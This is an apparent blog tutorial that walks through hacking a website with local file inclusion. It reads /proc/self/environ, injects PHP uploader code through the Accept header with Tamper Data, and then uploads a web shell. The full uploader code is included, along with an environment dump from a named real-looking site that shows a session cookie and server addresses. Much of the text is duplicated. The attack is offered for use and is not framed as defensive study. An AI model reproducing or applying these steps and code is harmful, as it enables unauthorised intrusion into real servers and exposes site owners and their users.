Upload Shell And Hack Website Using LFI
Hack Website Using LFI, Shell Upload Using LFI, Shell Uploading Using /proc/self/environ, Hack Website With /proc/self/environ, LFI, How To Hack With LFI, Shell Uploading
Hallo Friends Today I Shown how To Hack A Website using LFI:- Please Do Not Deafce This
Target Site:- http://site.co.in
Step:1 Find The LFI Target Point On This Website:- Target LFI Point:-http://site.co.in/cindex.php?file=search.php&stype=product&inputstring=Astrologers
Step:2 Now Remove All Text After The (.php?file=) Now Url looking Like This:- http://site.co.in/cindex.php?file=
Step:3 Put The Back_slash After The (.php?file=/) Now Url looking Like This:-http://site.co.in/cindex.php?file=/
If You Got Any Error After Puting The (/) Than Chance To Valurnable To LFI IS 80% If You Seen Datas Are Hide On Website, Than Chance To Valurnable To LFI IS 50-50%
Here Is Hide Datas On Website After Put (/)
Step:4 Put This Code After The (.php?file=) /proc/self/environ Now Url Look Like This:- http://site.co.in/cindex.php?file=/proc/self/environ
You Seen After Put /proc/self/environ Its Seen Some Seesion Request On Website, That Mins We Are Able To Upload Our Shell.
CONTEXT_DOCUMENT_ROOT=/home/yesdialc/public_htmlCONTEXT_PREFIX=DOCUMENT_ROOT=/home/yesdialc/public_htmlGATEWAY_INTERFACE=CGI/1.1HTTP_ACCEPT=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8HTTP_ACCEPT_ENCODING=gzip, deflateHTTP_ACCEPT_LANGUAGE=en-US,en;q=0.5HTTP_CACHE_CONTROL=max-age=259200HTTP_CONNECTION=keep-aliveHTTP_COOKIE=__zlcmid=YxfIFhdp6PIW3W; PHPSESSID=3ee7b2db915bb3f129710e349628560fHTTP_HOST=yesdial.co.inHTTP_USER_AGENT=Mozilla/5.0 (Windows NT 10.0; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0PATH=/bin:/usr/binQUERY_STRING=file=/proc/self/environREDIRECT_STATUS=200REMOTE_ADDR=207.244.89.110REMOTE_PORT=31421REQUEST_METHOD=GETREQUEST_SCHEME=httpREQUEST_URI=/cindex.php?file=/proc/self/environSCRIPT_FILENAME=/home/yesdialc/public_html/cindex.phpSCRIPT_NAME=/cindex.phpSERVER_ADDR=50.28.16.25SERVER_ADMIN=webmaster@yesdial.co.inSERVER_NAME=yesdial.co.inSERVER_PORT=80SERVER_PROTOCOL=HTTP/1.1SERVER_SIGNATURE=SERVER_SOFTWARE=Apache/2.4.18 (Unix) OpenSSL/1.0.1e-fips mod_bwlimited/1.4UNIQUE_ID=VrHzIDIcEBcAAHRHLlgAAAAC
Step:5 Open The Tamper Data(Mozila Addone) And Start The Tampering The data And refress The Traget Url:-
Step:6 Put Your Uploader Code in tamper Data On The User_code Or Accept, I Put My Uploader Code On The Accept.
And Submit The Request.
Uploader Code:-
<?php
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SUKSES !!!</b><br><br>'; }
else { echo '<b>Upload GAGAL !!!</b><br><br>'; }
}
?>
Hallo Friends Today I Shown how To Hack A Website using LFI:- Please Do Not Deafce This
Target Site:- http://site.co.in
Step:1 Find The LFI Target Point On This Website:- Target LFI Point:-http://site.co.in/cindex.php?file=search.php&stype=product&inputstring=Astrologers
Step:2 Now Remove All Text After The (.php?file=) Now Url looking Like This:- http://site.co.in/cindex.php?file=
Step:3 Put The Back_slash After The (.php?file=/) Now Url looking Like This:-http://site.co.in/cindex.php?file=/
If You Got Any Error After Puting The (/) Than Chance To Valurnable To LFI IS 80% If You Seen Datas Are Hide On Website, Than Chance To Valurnable To LFI IS 50-50%
Here Is Hide Datas On Website After Put (/)
Step:4 Put This Code After The (.php?file=) /proc/self/environ Now Url Look Like This:- http://site.co.in/cindex.php?file=/proc/self/environ
You Seen After Put /proc/self/environ Its Seen Some Seesion Request On Website, That Mins We Are Able To Upload Our Shell.
CONTEXT_DOCUMENT_ROOT=/home/yesdialc/public_htmlCONTEXT_PREFIX=DOCUMENT_ROOT=/home/yesdialc/public_htmlGATEWAY_INTERFACE=CGI/1.1HTTP_ACCEPT=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8HTTP_ACCEPT_ENCODING=gzip, deflateHTTP_ACCEPT_LANGUAGE=en-US,en;q=0.5HTTP_CACHE_CONTROL=max-age=259200HTTP_CONNECTION=keep-aliveHTTP_COOKIE=__zlcmid=YxfIFhdp6PIW3W; PHPSESSID=3ee7b2db915bb3f129710e349628560fHTTP_HOST=yesdial.co.inHTTP_USER_AGENT=Mozilla/5.0 (Windows NT 10.0; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0PATH=/bin:/usr/binQUERY_STRING=file=/proc/self/environREDIRECT_STATUS=200REMOTE_ADDR=207.244.89.110REMOTE_PORT=31421REQUEST_METHOD=GETREQUEST_SCHEME=httpREQUEST_URI=/cindex.php?file=/proc/self/environSCRIPT_FILENAME=/home/yesdialc/public_html/cindex.phpSCRIPT_NAME=/cindex.phpSERVER_ADDR=50.28.16.25SERVER_ADMIN=webmaster@yesdial.co.inSERVER_NAME=yesdial.co.inSERVER_PORT=80SERVER_PROTOCOL=HTTP/1.1SERVER_SIGNATURE=SERVER_SOFTWARE=Apache/2.4.18 (Unix) OpenSSL/1.0.1e-fips mod_bwlimited/1.4UNIQUE_ID=VrHzIDIcEBcAAHRHLlgAAAAC
Step:5 Open The Tamper Data(Mozila Addone) And Start The Tampering The data And refress The Traget Url:-
Step:6 Put Your Uploader Code in tamper Data On The User_code Or Accept, I Put My Uploader Code On The Accept.
And Submit The Request.
Uploader Code:-
<?php
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SUKSES !!!</b><br><br>'; }
else { echo '<b>Upload GAGAL !!!</b><br><br>'; }
}
?>
Step:7 Now You Seen Our Uplader in The Website, Here Upload Your shell And Submit Your Request in Tamper Data.
Step:8 Now Agin Put Your Uploader Code On The Accept, Using The Tamper data During The Shell Uploading Time.
Step:9 Your Shell Got Uploaded On the Server Check It Now.
Tnx For See My tutorials Please Post Your Positive Comment If You Learn Something New.
And Also Post Your Webhacking tutorials in Fourm.
Video Tutorial:-
My facebook Profile Link:- https://www.facebook.com/navdeep.dhukia.5
Step:8 Now Agin Put Your Uploader Code On The Accept, Using The Tamper data During The Shell Uploading Time.
Step:9 Your Shell Got Uploaded On the Server Check It Now.
Tnx For See My tutorials Please Post Your Positive Comment If You Learn Something New.
And Also Post Your Webhacking tutorials in Fourm.
Video Tutorial:-
My facebook Profile Link:- https://www.facebook.com/navdeep.dhukia.5
Upload Shell And Hack Website Using LFI
Reviewed by Unknown
on
2/21/2016
Rating: